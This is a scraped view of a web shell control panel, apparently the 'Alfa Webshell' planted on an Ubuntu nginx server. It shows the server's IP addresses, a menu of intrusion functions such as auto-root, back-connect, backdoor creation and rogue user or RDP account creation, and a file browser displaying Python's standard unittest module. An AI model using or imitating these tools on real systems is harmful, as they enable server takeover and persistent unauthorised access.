Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.12 /
unittest /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
3.41
KB
-rw-r--r--
__main__.py
472
B
-rw-r--r--
_log.py
2.68
KB
-rw-r--r--
async_case.py
5.34
KB
-rw-r--r--
case.py
56.18
KB
-rw-r--r--
loader.py
20.52
KB
-rw-r--r--
main.py
11.71
KB
-rw-r--r--
mock.py
102.5
KB
-rw-r--r--
result.py
8.92
KB
-rw-r--r--
runner.py
10.13
KB
-rw-r--r--
signals.py
2.35
KB
-rw-r--r--
suite.py
13.2
KB
-rw-r--r--
util.py
5.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __main__.py
"""Main entry point""" import sys if sys.argv[0].endswith("__main__.py"): import os.path # We change sys.argv[0] to make help message more useful # use executable without path, unquoted # (it's just a hint anyway) # (if you have spaces in your executable you get what you deserve!) executable = os.path.basename(sys.executable) sys.argv[0] = executable + " -m unittest" del os __unittest = True from .main import main main(module=None)
Close